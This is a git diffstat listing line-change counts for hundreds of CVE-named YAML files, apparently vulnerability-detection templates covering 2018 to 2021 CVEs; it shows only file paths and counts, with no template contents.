http/cves/2018/CVE-2018-13980.yaml | 1 + http/cves/2018/CVE-2018-14013.yaml | 3 +- http/cves/2018/CVE-2018-14064.yaml | 1 + http/cves/2018/CVE-2018-14474.yaml | 1 + http/cves/2018/CVE-2018-14574.yaml | 3 +- http/cves/2018/CVE-2018-14728.yaml | 3 +- http/cves/2018/CVE-2018-14912.yaml | 3 +- http/cves/2018/CVE-2018-14916.yaml | 1 + http/cves/2018/CVE-2018-14918.yaml | 1 + http/cves/2018/CVE-2018-14931.yaml | 1 + http/cves/2018/CVE-2018-15138.yaml | 3 +- http/cves/2018/CVE-2018-15517.yaml | 1 + http/cves/2018/CVE-2018-15535.yaml | 3 +- http/cves/2018/CVE-2018-15745.yaml | 3 +- http/cves/2018/CVE-2018-15961.yaml | 3 +- http/cves/2018/CVE-2018-16059.yaml | 3 +- http/cves/2018/CVE-2018-16133.yaml | 3 +- http/cves/2018/CVE-2018-16139.yaml | 1 + http/cves/2018/CVE-2018-16159.yaml | 3 +- http/cves/2018/CVE-2018-16167.yaml | 1 + http/cves/2018/CVE-2018-16283.yaml | 3 +- http/cves/2018/CVE-2018-16288.yaml | 3 +- http/cves/2018/CVE-2018-16299.yaml | 3 +- http/cves/2018/CVE-2018-16341.yaml | 6 +- http/cves/2018/CVE-2018-16668.yaml | 3 +- http/cves/2018/CVE-2018-16670.yaml | 3 +- http/cves/2018/CVE-2018-16671.yaml | 3 +- http/cves/2018/CVE-2018-16716.yaml | 3 +- http/cves/2018/CVE-2018-16761.yaml | 1 + http/cves/2018/CVE-2018-16763.yaml | 3 +- http/cves/2018/CVE-2018-16836.yaml | 3 +- http/cves/2018/CVE-2018-16979.yaml | 1 + http/cves/2018/CVE-2018-17246.yaml | 1 + http/cves/2018/CVE-2018-17254.yaml | 4 +- http/cves/2018/CVE-2018-17422.yaml | 1 + http/cves/2018/CVE-2018-17431.yaml | 1 + http/cves/2018/CVE-2018-18069.yaml | 1 + http/cves/2018/CVE-2018-18264.yaml | 3 +- http/cves/2018/CVE-2018-18323.yaml | 1 + http/cves/2018/CVE-2018-18570.yaml | 1 + http/cves/2018/CVE-2018-18608.yaml | 1 + http/cves/2018/CVE-2018-18775.yaml | 1 + http/cves/2018/CVE-2018-18777.yaml | 1 + http/cves/2018/CVE-2018-18778.yaml | 1 + http/cves/2018/CVE-2018-18809.yaml | 14 ++- http/cves/2018/CVE-2018-18925.yaml | 3 +- http/cves/2018/CVE-2018-19136.yaml | 3 +- http/cves/2018/CVE-2018-19137.yaml | 1 + http/cves/2018/CVE-2018-19287.yaml | 1 + http/cves/2018/CVE-2018-19326.yaml | 3 +- http/cves/2018/CVE-2018-19365.yaml | 3 +- http/cves/2018/CVE-2018-19386.yaml | 1 + http/cves/2018/CVE-2018-19439.yaml | 1 + http/cves/2018/CVE-2018-19458.yaml | 3 +- http/cves/2018/CVE-2018-19749.yaml | 1 + http/cves/2018/CVE-2018-19751.yaml | 1 + http/cves/2018/CVE-2018-19752.yaml | 1 + http/cves/2018/CVE-2018-19753.yaml | 3 +- http/cves/2018/CVE-2018-19877.yaml | 1 + http/cves/2018/CVE-2018-19892.yaml | 1 + http/cves/2018/CVE-2018-19914.yaml | 1 + http/cves/2018/CVE-2018-19915.yaml | 1 + http/cves/2018/CVE-2018-20009.yaml | 1 + http/cves/2018/CVE-2018-20010.yaml | 1 + http/cves/2018/CVE-2018-20011.yaml | 1 + http/cves/2018/CVE-2018-20462.yaml | 1 + http/cves/2018/CVE-2018-20463.yaml | 3 +- http/cves/2018/CVE-2018-20470.yaml | 1 + http/cves/2018/CVE-2018-20526.yaml | 1 + http/cves/2018/CVE-2018-20608.yaml | 8 ++ http/cves/2018/CVE-2018-20824.yaml | 1 + http/cves/2018/CVE-2018-20985.yaml | 1 + http/cves/2018/CVE-2018-2392.yaml | 1 + http/cves/2018/CVE-2018-2791.yaml | 1 + http/cves/2018/CVE-2018-2894.yaml | 1 + http/cves/2018/CVE-2018-3167.yaml | 3 +- http/cves/2018/CVE-2018-3238.yaml | 3 +- http/cves/2018/CVE-2018-3714.yaml | 1 + http/cves/2018/CVE-2018-3760.yaml | 1 + http/cves/2018/CVE-2018-3810.yaml | 3 +- http/cves/2018/CVE-2018-5230.yaml | 1 + http/cves/2018/CVE-2018-5233.yaml | 3 +- http/cves/2018/CVE-2018-5316.yaml | 3 +- http/cves/2018/CVE-2018-5715.yaml | 1 + http/cves/2018/CVE-2018-6008.yaml | 1 + http/cves/2018/CVE-2018-6184.yaml | 1 + http/cves/2018/CVE-2018-6200.yaml | 1 + http/cves/2018/CVE-2018-6530.yaml | 1 + http/cves/2018/CVE-2018-6910.yaml | 1 + http/cves/2018/CVE-2018-7251.yaml | 1 + http/cves/2018/CVE-2018-7422.yaml | 3 +- http/cves/2018/CVE-2018-7467.yaml | 1 + http/cves/2018/CVE-2018-7490.yaml | 3 +- http/cves/2018/CVE-2018-7600.yaml | 3 +- http/cves/2018/CVE-2018-7602.yaml | 3 +- http/cves/2018/CVE-2018-7653.yaml | 9 +- http/cves/2018/CVE-2018-7662.yaml | 1 + http/cves/2018/CVE-2018-7700.yaml | 1 + http/cves/2018/CVE-2018-7719.yaml | 3 +- http/cves/2018/CVE-2018-8006.yaml | 3 +- http/cves/2018/CVE-2018-8033.yaml | 3 +- http/cves/2018/CVE-2018-8715.yaml | 3 +- http/cves/2018/CVE-2018-8719.yaml | 3 +- http/cves/2018/CVE-2018-8727.yaml | 1 + http/cves/2018/CVE-2018-8770.yaml | 3 +- http/cves/2018/CVE-2018-9118.yaml | 1 + http/cves/2018/CVE-2018-9161.yaml | 3 +- http/cves/2018/CVE-2018-9205.yaml | 3 +- http/cves/2018/CVE-2018-9845.yaml | 1 + http/cves/2018/CVE-2018-9995.yaml | 3 +- http/cves/2019/CVE-2019-0193.yaml | 3 +- http/cves/2019/CVE-2019-0221.yaml | 2 +- http/cves/2019/CVE-2019-0230.yaml | 4 +- http/cves/2019/CVE-2019-10068.yaml | 1 + http/cves/2019/CVE-2019-10092.yaml | 3 +- http/cves/2019/CVE-2019-10098.yaml | 3 +- http/cves/2019/CVE-2019-1010287.yaml | 1 + http/cves/2019/CVE-2019-1010290.yaml | 1 + http/cves/2019/CVE-2019-10232.yaml | 3 +- http/cves/2019/CVE-2019-10405.yaml | 1 + http/cves/2019/CVE-2019-10475.yaml | 3 +- http/cves/2019/CVE-2019-10692.yaml | 3 +- http/cves/2019/CVE-2019-10717.yaml | 1 + http/cves/2019/CVE-2019-10758.yaml | 1 + http/cves/2019/CVE-2019-11013.yaml | 1 + http/cves/2019/CVE-2019-11248.yaml | 3 +- http/cves/2019/CVE-2019-11370.yaml | 1 + http/cves/2019/CVE-2019-11510.yaml | 3 +- http/cves/2019/CVE-2019-11580.yaml | 3 +- http/cves/2019/CVE-2019-11581.yaml | 1 + http/cves/2019/CVE-2019-11869.yaml | 1 + http/cves/2019/CVE-2019-12276.yaml | 3 +- http/cves/2019/CVE-2019-12314.yaml | 3 +- http/cves/2019/CVE-2019-12461.yaml | 1 + http/cves/2019/CVE-2019-12581.yaml | 1 + http/cves/2019/CVE-2019-12583.yaml | 1 + http/cves/2019/CVE-2019-12593.yaml | 3 +- http/cves/2019/CVE-2019-12616.yaml | 1 + http/cves/2019/CVE-2019-12725.yaml | 3 +- http/cves/2019/CVE-2019-12962.yaml | 1 + http/cves/2019/CVE-2019-12985.yaml | 1 + http/cves/2019/CVE-2019-12986.yaml | 1 + http/cves/2019/CVE-2019-12987.yaml | 1 + http/cves/2019/CVE-2019-12988.yaml | 1 + http/cves/2019/CVE-2019-12990.yaml | 1 + http/cves/2019/CVE-2019-13101.yaml | 1 + http/cves/2019/CVE-2019-13392.yaml | 1 + http/cves/2019/CVE-2019-13396.yaml | 1 + http/cves/2019/CVE-2019-13462.yaml | 1 + http/cves/2019/CVE-2019-14205.yaml | 1 + http/cves/2019/CVE-2019-14223.yaml | 1 + http/cves/2019/CVE-2019-14251.yaml | 1 + http/cves/2019/CVE-2019-14312.yaml | 1 + http/cves/2019/CVE-2019-14322.yaml | 3 +- http/cves/2019/CVE-2019-14470.yaml | 3 +- http/cves/2019/CVE-2019-14530.yaml | 3 +- http/cves/2019/CVE-2019-14696.yaml | 1 + http/cves/2019/CVE-2019-14750.yaml | 160 ++++++++++++++------------- http/cves/2019/CVE-2019-14789.yaml | 5 +- http/cves/2019/CVE-2019-14974.yaml | 1 + http/cves/2019/CVE-2019-15043.yaml | 3 +- http/cves/2019/CVE-2019-15107.yaml | 3 +- http/cves/2019/CVE-2019-15501.yaml | 1 + http/cves/2019/CVE-2019-15642.yaml | 17 ++- http/cves/2019/CVE-2019-15713.yaml | 1 + http/cves/2019/CVE-2019-15811.yaml | 1 + http/cves/2019/CVE-2019-15858.yaml | 1 + http/cves/2019/CVE-2019-15859.yaml | 3 +- http/cves/2019/CVE-2019-15889.yaml | 3 +- http/cves/2019/CVE-2019-16057.yaml | 5 + http/cves/2019/CVE-2019-16097.yaml | 3 +- http/cves/2019/CVE-2019-16123.yaml | 1 + http/cves/2019/CVE-2019-16278.yaml | 3 +- http/cves/2019/CVE-2019-16313.yaml | 3 +- http/cves/2019/CVE-2019-16332.yaml | 1 + http/cves/2019/CVE-2019-16525.yaml | 1 + http/cves/2019/CVE-2019-1653.yaml | 1 + http/cves/2019/CVE-2019-16662.yaml | 1 + http/cves/2019/CVE-2019-16759.yaml | 1 + http/cves/2019/CVE-2019-16920.yaml | 3 +- http/cves/2019/CVE-2019-16931.yaml | 1 + http/cves/2019/CVE-2019-16932.yaml | 1 + http/cves/2019/CVE-2019-16996.yaml | 1 + http/cves/2019/CVE-2019-16997.yaml | 1 + http/cves/2019/CVE-2019-17270.yaml | 3 +- http/cves/2019/CVE-2019-17382.yaml | 4 +- http/cves/2019/CVE-2019-17418.yaml | 1 + http/cves/2019/CVE-2019-17444.yaml | 3 +- http/cves/2019/CVE-2019-17503.yaml | 3 +- http/cves/2019/CVE-2019-17506.yaml | 1 + http/cves/2019/CVE-2019-17538.yaml | 1 + http/cves/2019/CVE-2019-17558.yaml | 1 + http/cves/2019/CVE-2019-17574.yaml | 3 +- http/cves/2019/CVE-2019-17662.yaml | 11 +- http/cves/2019/CVE-2019-1821.yaml | 1 + http/cves/2019/CVE-2019-18371.yaml | 3 +- http/cves/2019/CVE-2019-18393.yaml | 1 + http/cves/2019/CVE-2019-18394.yaml | 3 +- http/cves/2019/CVE-2019-18665.yaml | 3 +- http/cves/2019/CVE-2019-18818.yaml | 3 +- http/cves/2019/CVE-2019-18922.yaml | 3 +- http/cves/2019/CVE-2019-18957.yaml | 1 + http/cves/2019/CVE-2019-1898.yaml | 8 +- http/cves/2019/CVE-2019-19134.yaml | 1 + http/cves/2019/CVE-2019-19368.yaml | 3 +- http/cves/2019/CVE-2019-1943.yaml | 1 + http/cves/2019/CVE-2019-19781.yaml | 3 +- http/cves/2019/CVE-2019-19824.yaml | 3 +- http/cves/2019/CVE-2019-19908.yaml | 1 + http/cves/2019/CVE-2019-19985.yaml | 3 +- http/cves/2019/CVE-2019-20085.yaml | 3 +- http/cves/2019/CVE-2019-20141.yaml | 1 + http/cves/2019/CVE-2019-20183.yaml | 1 + http/cves/2019/CVE-2019-20210.yaml | 1 + http/cves/2019/CVE-2019-20224.yaml | 3 +- http/cves/2019/CVE-2019-20933.yaml | 3 +- http/cves/2019/CVE-2019-2578.yaml | 3 +- http/cves/2019/CVE-2019-2579.yaml | 1 + http/cves/2019/CVE-2019-2588.yaml | 3 +- http/cves/2019/CVE-2019-2616.yaml | 3 +- http/cves/2019/CVE-2019-2725.yaml | 3 +- http/cves/2019/CVE-2019-2729.yaml | 3 +- http/cves/2019/CVE-2019-2767.yaml | 1 + http/cves/2019/CVE-2019-3396.yaml | 3 +- http/cves/2019/CVE-2019-3398.yaml | 3 +- http/cves/2019/CVE-2019-3401.yaml | 1 + http/cves/2019/CVE-2019-3402.yaml | 1 + http/cves/2019/CVE-2019-3403.yaml | 1 + http/cves/2019/CVE-2019-3799.yaml | 3 +- http/cves/2019/CVE-2019-3911.yaml | 1 + http/cves/2019/CVE-2019-3912.yaml | 1 + http/cves/2019/CVE-2019-3929.yaml | 5 +- http/cves/2019/CVE-2019-5127.yaml | 4 +- http/cves/2019/CVE-2019-5418.yaml | 3 +- http/cves/2019/CVE-2019-5434.yaml | 1 + http/cves/2019/CVE-2019-6112.yaml | 3 +- http/cves/2019/CVE-2019-6340.yaml | 5 +- http/cves/2019/CVE-2019-6715.yaml | 1 + http/cves/2019/CVE-2019-6799.yaml | 3 +- http/cves/2019/CVE-2019-6802.yaml | 1 + http/cves/2019/CVE-2019-7192.yaml | 10 +- http/cves/2019/CVE-2019-7219.yaml | 1 + http/cves/2019/CVE-2019-7238.yaml | 3 +- http/cves/2019/CVE-2019-7254.yaml | 3 +- http/cves/2019/CVE-2019-7255.yaml | 1 + http/cves/2019/CVE-2019-7256.yaml | 3 +- http/cves/2019/CVE-2019-7275.yaml | 1 + http/cves/2019/CVE-2019-7315.yaml | 1 + http/cves/2019/CVE-2019-7481.yaml | 3 +- http/cves/2019/CVE-2019-7543.yaml | 1 + http/cves/2019/CVE-2019-7609.yaml | 1 + http/cves/2019/CVE-2019-8086.yaml | 1 + http/cves/2019/CVE-2019-8390.yaml | 1 + http/cves/2019/CVE-2019-8442.yaml | 1 + http/cves/2019/CVE-2019-8446.yaml | 3 +- http/cves/2019/CVE-2019-8449.yaml | 3 +- http/cves/2019/CVE-2019-8451.yaml | 1 + http/cves/2019/CVE-2019-8903.yaml | 3 +- http/cves/2019/CVE-2019-8937.yaml | 1 + http/cves/2019/CVE-2019-8982.yaml | 1 + http/cves/2019/CVE-2019-9041.yaml | 1 + http/cves/2019/CVE-2019-9618.yaml | 1 + http/cves/2019/CVE-2019-9670.yaml | 3 +- http/cves/2019/CVE-2019-9726.yaml | 1 + http/cves/2019/CVE-2019-9733.yaml | 3 +- http/cves/2019/CVE-2019-9915.yaml | 3 +- http/cves/2019/CVE-2019-9922.yaml | 3 +- http/cves/2019/CVE-2019-9955.yaml | 3 +- http/cves/2019/CVE-2019-9978.yaml | 3 +- http/cves/2020/CVE-2020-0618.yaml | 3 +- http/cves/2020/CVE-2020-10148.yaml | 5 +- http/cves/2020/CVE-2020-10199.yaml | 5 +- http/cves/2020/CVE-2020-10546.yaml | 3 +- http/cves/2020/CVE-2020-10547.yaml | 3 +- http/cves/2020/CVE-2020-10548.yaml | 3 +- http/cves/2020/CVE-2020-10549.yaml | 3 +- http/cves/2020/CVE-2020-10770.yaml | 3 +- http/cves/2020/CVE-2020-10973.yaml | 3 +- http/cves/2020/CVE-2020-11034.yaml | 1 + http/cves/2020/CVE-2020-11110.yaml | 1 + http/cves/2020/CVE-2020-11450.yaml | 3 +- http/cves/2020/CVE-2020-11455.yaml | 3 +- http/cves/2020/CVE-2020-11529.yaml | 1 + http/cves/2020/CVE-2020-11530.yaml | 3 +- http/cves/2020/CVE-2020-11546.yaml | 1 + http/cves/2020/CVE-2020-11547.yaml | 1 + http/cves/2020/CVE-2020-11710.yaml | 1 + http/cves/2020/CVE-2020-11738.yaml | 3 +- http/cves/2020/CVE-2020-11798.yaml | 11 +- http/cves/2020/CVE-2020-11853.yaml | 1 + http/cves/2020/CVE-2020-11854.yaml | 1 + http/cves/2020/CVE-2020-11930.yaml | 3 +- http/cves/2020/CVE-2020-11978.yaml | 1 + http/cves/2020/CVE-2020-11991.yaml | 3 +- http/cves/2020/CVE-2020-12054.yaml | 1 + http/cves/2020/CVE-2020-12116.yaml | 3 +- http/cves/2020/CVE-2020-12127.yaml | 1 + http/cves/2020/CVE-2020-12447.yaml | 3 +- http/cves/2020/CVE-2020-12478.yaml | 3 +- http/cves/2020/CVE-2020-12720.yaml | 3 +- http/cves/2020/CVE-2020-12800.yaml | 3 +- http/cves/2020/CVE-2020-13117.yaml | 1 + http/cves/2020/CVE-2020-13121.yaml | 1 + http/cves/2020/CVE-2020-13158.yaml | 3 +- http/cves/2020/CVE-2020-13167.yaml | 2 +- http/cves/2020/CVE-2020-13258.yaml | 1 + http/cves/2020/CVE-2020-13379.yaml | 3 +- http/cves/2020/CVE-2020-13405.yaml | 1 + http/cves/2020/CVE-2020-13483.yaml | 1 + http/cves/2020/CVE-2020-13700.yaml | 3 +- http/cves/2020/CVE-2020-13820.yaml | 1 + http/cves/2020/CVE-2020-13927.yaml | 3 +- http/cves/2020/CVE-2020-13937.yaml | 1 + http/cves/2020/CVE-2020-13942.yaml | 2 +- http/cves/2020/CVE-2020-13945.yaml | 3 +- http/cves/2020/CVE-2020-14092.yaml | 1 + http/cves/2020/CVE-2020-14144.yaml | 3 +- http/cves/2020/CVE-2020-14179.yaml | 1 + http/cves/2020/CVE-2020-14181.yaml | 3 +- http/cves/2020/CVE-2020-14408.yaml | 1 + http/cves/2020/CVE-2020-14413.yaml | 1 + http/cves/2020/CVE-2020-14750.yaml | 3 +- http/cves/2020/CVE-2020-14864.yaml | 3 +- http/cves/2020/CVE-2020-14882.yaml | 3 +- http/cves/2020/CVE-2020-14883.yaml | 3 +- http/cves/2020/CVE-2020-15050.yaml | 3 +- http/cves/2020/CVE-2020-15129.yaml | 1 + http/cves/2020/CVE-2020-15148.yaml | 3 +- http/cves/2020/CVE-2020-15227.yaml | 3 +- http/cves/2020/CVE-2020-15500.yaml | 1 + http/cves/2020/CVE-2020-15505.yaml | 1 + http/cves/2020/CVE-2020-15568.yaml | 2 +- http/cves/2020/CVE-2020-15867.yaml | 3 +- http/cves/2020/CVE-2020-15895.yaml | 1 + http/cves/2020/CVE-2020-15920.yaml | 3 +- http/cves/2020/CVE-2020-16139.yaml | 1 + http/cves/2020/CVE-2020-16846.yaml | 4 +- http/cves/2020/CVE-2020-16952.yaml | 3 +- http/cves/2020/CVE-2020-17362.yaml | 1 + http/cves/2020/CVE-2020-17453.yaml | 1 + http/cves/2020/CVE-2020-17456.yaml | 1 + http/cves/2020/CVE-2020-17463.yaml | 16 +-- http/cves/2020/CVE-2020-17496.yaml | 3 +- http/cves/2020/CVE-2020-17505.yaml | 1 + http/cves/2020/CVE-2020-17506.yaml | 3 +- http/cves/2020/CVE-2020-17518.yaml | 3 +- http/cves/2020/CVE-2020-17519.yaml | 3 +- http/cves/2020/CVE-2020-17526.yaml | 3 +- http/cves/2020/CVE-2020-17530.yaml | 3 +- http/cves/2020/CVE-2020-18268.yaml | 1 + http/cves/2020/CVE-2020-19282.yaml | 1 + http/cves/2020/CVE-2020-19283.yaml | 1 + http/cves/2020/CVE-2020-19295.yaml | 3 +- http/cves/2020/CVE-2020-19360.yaml | 3 +- http/cves/2020/CVE-2020-1943.yaml | 1 + http/cves/2020/CVE-2020-19515.yaml | 1 + http/cves/2020/CVE-2020-1956.yaml | 1 + http/cves/2020/CVE-2020-19625.yaml | 1 + http/cves/2020/CVE-2020-20285.yaml | 1 + http/cves/2020/CVE-2020-20300.yaml | 3 +- http/cves/2020/CVE-2020-2036.yaml | 3 +- http/cves/2020/CVE-2020-2096.yaml | 1 + http/cves/2020/CVE-2020-20982.yaml | 3 +- http/cves/2020/CVE-2020-20988.yaml | 1 + http/cves/2020/CVE-2020-21012.yaml | 3 +- http/cves/2020/CVE-2020-2103.yaml | 1 + http/cves/2020/CVE-2020-21224.yaml | 3 +- http/cves/2020/CVE-2020-2140.yaml | 3 +- http/cves/2020/CVE-2020-22208.yaml | 1 + http/cves/2020/CVE-2020-22209.yaml | 1 + http/cves/2020/CVE-2020-22210.yaml | 1 + http/cves/2020/CVE-2020-22211.yaml | 1 + http/cves/2020/CVE-2020-22840.yaml | 1 + http/cves/2020/CVE-2020-23015.yaml | 1 + http/cves/2020/CVE-2020-23517.yaml | 1 + http/cves/2020/CVE-2020-23575.yaml | 1 + http/cves/2020/CVE-2020-23697.yaml | 1 + http/cves/2020/CVE-2020-23972.yaml | 4 +- http/cves/2020/CVE-2020-24148.yaml | 3 +- http/cves/2020/CVE-2020-24186.yaml | 3 +- http/cves/2020/CVE-2020-24223.yaml | 1 + http/cves/2020/CVE-2020-24312.yaml | 3 +- http/cves/2020/CVE-2020-24391.yaml | 3 +- http/cves/2020/CVE-2020-24550.yaml | 1 + http/cves/2020/CVE-2020-24571.yaml | 1 + http/cves/2020/CVE-2020-24579.yaml | 3 +- http/cves/2020/CVE-2020-24589.yaml | 3 +- http/cves/2020/CVE-2020-24902.yaml | 3 +- http/cves/2020/CVE-2020-24903.yaml | 1 + http/cves/2020/CVE-2020-24912.yaml | 1 + http/cves/2020/CVE-2020-24949.yaml | 1 + http/cves/2020/CVE-2020-25078.yaml | 1 + http/cves/2020/CVE-2020-25213.yaml | 3 +- http/cves/2020/CVE-2020-25223.yaml | 3 +- http/cves/2020/CVE-2020-25495.yaml | 1 + http/cves/2020/CVE-2020-25506.yaml | 1 + http/cves/2020/CVE-2020-2551.yaml | 1 + http/cves/2020/CVE-2020-25540.yaml | 3 +- http/cves/2020/CVE-2020-25780.yaml | 1 + http/cves/2020/CVE-2020-25864.yaml | 1 + http/cves/2020/CVE-2020-26073.yaml | 4 +- http/cves/2020/CVE-2020-26153.yaml | 1 + http/cves/2020/CVE-2020-26214.yaml | 3 +- http/cves/2020/CVE-2020-26217.yaml | 1 + http/cves/2020/CVE-2020-26248.yaml | 3 +- http/cves/2020/CVE-2020-26258.yaml | 1 + http/cves/2020/CVE-2020-26413.yaml | 3 +- http/cves/2020/CVE-2020-26876.yaml | 1 + http/cves/2020/CVE-2020-26919.yaml | 3 +- http/cves/2020/CVE-2020-26948.yaml | 3 +- http/cves/2020/CVE-2020-27191.yaml | 3 +- http/cves/2020/CVE-2020-2733.yaml | 3 +- http/cves/2020/CVE-2020-27361.yaml | 1 + http/cves/2020/CVE-2020-27467.yaml | 3 +- http/cves/2020/CVE-2020-27481.yaml | 3 +- http/cves/2020/CVE-2020-27735.yaml | 3 +- http/cves/2020/CVE-2020-27866.yaml | 1 + http/cves/2020/CVE-2020-27982.yaml | 3 +- http/cves/2020/CVE-2020-27986.yaml | 1 + http/cves/2020/CVE-2020-28185.yaml | 12 +- http/cves/2020/CVE-2020-28188.yaml | 3 +- http/cves/2020/CVE-2020-28208.yaml | 3 +- http/cves/2020/CVE-2020-28351.yaml | 3 +- http/cves/2020/CVE-2020-28871.yaml | 3 +- http/cves/2020/CVE-2020-28976.yaml | 3 +- http/cves/2020/CVE-2020-29164.yaml | 1 + http/cves/2020/CVE-2020-29227.yaml | 3 +- http/cves/2020/CVE-2020-29284.yaml | 3 +- http/cves/2020/CVE-2020-29395.yaml | 3 +- http/cves/2020/CVE-2020-29453.yaml | 1 + http/cves/2020/CVE-2020-29583.yaml | 3 +- http/cves/2020/CVE-2020-29597.yaml | 3 +- http/cves/2020/CVE-2020-3187.yaml | 3 +- http/cves/2020/CVE-2020-3452.yaml | 7 +- http/cves/2020/CVE-2020-35234.yaml | 3 +- http/cves/2020/CVE-2020-35338.yaml | 3 +- http/cves/2020/CVE-2020-35476.yaml | 3 +- http/cves/2020/CVE-2020-35489.yaml | 3 +- http/cves/2020/CVE-2020-35580.yaml | 3 +- http/cves/2020/CVE-2020-35598.yaml | 3 +- http/cves/2020/CVE-2020-35713.yaml | 3 +- http/cves/2020/CVE-2020-35729.yaml | 4 +- http/cves/2020/CVE-2020-35736.yaml | 3 +- http/cves/2020/CVE-2020-35749.yaml | 1 + http/cves/2020/CVE-2020-35774.yaml | 1 + http/cves/2020/CVE-2020-3580.yaml | 1 + http/cves/2020/CVE-2020-35846.yaml | 3 +- http/cves/2020/CVE-2020-35847.yaml | 3 +- http/cves/2020/CVE-2020-35848.yaml | 3 +- http/cves/2020/CVE-2020-35951.yaml | 3 +- http/cves/2020/CVE-2020-35984.yaml | 1 + http/cves/2020/CVE-2020-35985.yaml | 1 + http/cves/2020/CVE-2020-35986.yaml | 1 + http/cves/2020/CVE-2020-35987.yaml | 1 + http/cves/2020/CVE-2020-36112.yaml | 3 +- http/cves/2020/CVE-2020-36289.yaml | 3 +- http/cves/2020/CVE-2020-36365.yaml | 1 + http/cves/2020/CVE-2020-36510.yaml | 3 +- http/cves/2020/CVE-2020-4463.yaml | 3 +- http/cves/2020/CVE-2020-5191.yaml | 1 + http/cves/2020/CVE-2020-5192.yaml | 3 +- http/cves/2020/CVE-2020-5284.yaml | 3 +- http/cves/2020/CVE-2020-5307.yaml | 1 + http/cves/2020/CVE-2020-5405.yaml | 1 + http/cves/2020/CVE-2020-5410.yaml | 3 +- http/cves/2020/CVE-2020-5412.yaml | 5 +- http/cves/2020/CVE-2020-5775.yaml | 3 +- http/cves/2020/CVE-2020-5776.yaml | 3 +- http/cves/2020/CVE-2020-5777.yaml | 3 +- http/cves/2020/CVE-2020-5847.yaml | 3 +- http/cves/2020/CVE-2020-5902.yaml | 1 + http/cves/2020/CVE-2020-6171.yaml | 1 + http/cves/2020/CVE-2020-6207.yaml | 1 + http/cves/2020/CVE-2020-6287.yaml | 1 + http/cves/2020/CVE-2020-6308.yaml | 1 + http/cves/2020/CVE-2020-6637.yaml | 3 +- http/cves/2020/CVE-2020-7107.yaml | 1 + http/cves/2020/CVE-2020-7136.yaml | 3 +- http/cves/2020/CVE-2020-7209.yaml | 3 +- http/cves/2020/CVE-2020-7318.yaml | 1 + http/cves/2020/CVE-2020-7796.yaml | 3 +- http/cves/2020/CVE-2020-7943.yaml | 3 +- http/cves/2020/CVE-2020-7961.yaml | 3 +- http/cves/2020/CVE-2020-7980.yaml | 3 +- http/cves/2020/CVE-2020-8115.yaml | 1 + http/cves/2020/CVE-2020-8163.yaml | 3 +- http/cves/2020/CVE-2020-8191.yaml | 1 + http/cves/2020/CVE-2020-8193.yaml | 3 +- http/cves/2020/CVE-2020-8194.yaml | 3 +- http/cves/2020/CVE-2020-8209.yaml | 1 + http/cves/2020/CVE-2020-8497.yaml | 1 + http/cves/2020/CVE-2020-8512.yaml | 1 + http/cves/2020/CVE-2020-8515.yaml | 3 +- http/cves/2020/CVE-2020-8641.yaml | 3 +- http/cves/2020/CVE-2020-8644.yaml | 3 +- http/cves/2020/CVE-2020-8654.yaml | 3 +- http/cves/2020/CVE-2020-8771.yaml | 1 + http/cves/2020/CVE-2020-8772.yaml | 1 + http/cves/2020/CVE-2020-8813.yaml | 3 +- http/cves/2020/CVE-2020-8982.yaml | 3 +- http/cves/2020/CVE-2020-9036.yaml | 1 + http/cves/2020/CVE-2020-9043.yaml | 3 +- http/cves/2020/CVE-2020-9047.yaml | 3 +- http/cves/2020/CVE-2020-9054.yaml | 3 +- http/cves/2020/CVE-2020-9315.yaml | 1 + http/cves/2020/CVE-2020-9344.yaml | 7 +- http/cves/2020/CVE-2020-9376.yaml | 1 + http/cves/2020/CVE-2020-9402.yaml | 3 +- http/cves/2020/CVE-2020-9425.yaml | 3 +- http/cves/2020/CVE-2020-9483.yaml | 3 +- http/cves/2020/CVE-2020-9484.yaml | 3 +- http/cves/2020/CVE-2020-9496.yaml | 3 +- http/cves/2020/CVE-2020-9757.yaml | 3 +- http/cves/2021/CVE-2021-1472.yaml | 5 +- http/cves/2021/CVE-2021-1497.yaml | 2 +- http/cves/2021/CVE-2021-1498.yaml | 1 + http/cves/2021/CVE-2021-1499.yaml | 1 + http/cves/2021/CVE-2021-20031.yaml | 1 + http/cves/2021/CVE-2021-20038.yaml | 3 +- http/cves/2021/CVE-2021-20090.yaml | 3 +- http/cves/2021/CVE-2021-20091.yaml | 3 +- http/cves/2021/CVE-2021-20092.yaml | 3 +- http/cves/2021/CVE-2021-20114.yaml | 1 + http/cves/2021/CVE-2021-20123.yaml | 3 +- http/cves/2021/CVE-2021-20124.yaml | 3 +- http/cves/2021/CVE-2021-20137.yaml | 3 +- http/cves/2021/CVE-2021-20150.yaml | 3 +- http/cves/2021/CVE-2021-20158.yaml | 4 +- http/cves/2021/CVE-2021-20167.yaml | 3 +- http/cves/2021/CVE-2021-20323.yaml | 3 +- http/cves/2021/CVE-2021-20792.yaml | 1 + http/cves/2021/CVE-2021-20837.yaml | 3 +- http/cves/2021/CVE-2021-21087.yaml | 2 + http/cves/2021/CVE-2021-21234.yaml | 3 +- http/cves/2021/CVE-2021-21287.yaml | 3 +- http/cves/2021/CVE-2021-21307.yaml | 3 +- http/cves/2021/CVE-2021-21311.yaml | 1 + http/cves/2021/CVE-2021-21315.yaml | 3 +- http/cves/2021/CVE-2021-21345.yaml | 3 +- http/cves/2021/CVE-2021-21351.yaml | 3 +- http/cves/2021/CVE-2021-21389.yaml | 1 + http/cves/2021/CVE-2021-21402.yaml | 3 +- http/cves/2021/CVE-2021-21479.yaml | 3 +- http/cves/2021/CVE-2021-21745.yaml | 3 +- http/cves/2021/CVE-2021-21799.yaml | 1 + http/cves/2021/CVE-2021-21800.yaml | 1 + http/cves/2021/CVE-2021-21801.yaml | 1 + http/cves/2021/CVE-2021-21802.yaml | 1 + http/cves/2021/CVE-2021-21803.yaml | 1 + http/cves/2021/CVE-2021-21805.yaml | 1 + http/cves/2021/CVE-2021-21816.yaml | 3 +- http/cves/2021/CVE-2021-21881.yaml | 3 +- http/cves/2021/CVE-2021-21972.yaml | 3 +- http/cves/2021/CVE-2021-21973.yaml | 3 +- http/cves/2021/CVE-2021-21975.yaml | 3 +- http/cves/2021/CVE-2021-21978.yaml | 5 +- http/cves/2021/CVE-2021-21985.yaml | 3 +- http/cves/2021/CVE-2021-22005.yaml | 5 +- http/cves/2021/CVE-2021-22053.yaml | 3 +- http/cves/2021/CVE-2021-22054.yaml | 3 +- http/cves/2021/CVE-2021-22122.yaml | 1 + http/cves/2021/CVE-2021-22145.yaml | 3 +- http/cves/2021/CVE-2021-22205.yaml | 3 +- http/cves/2021/CVE-2021-22214.yaml | 3 +- 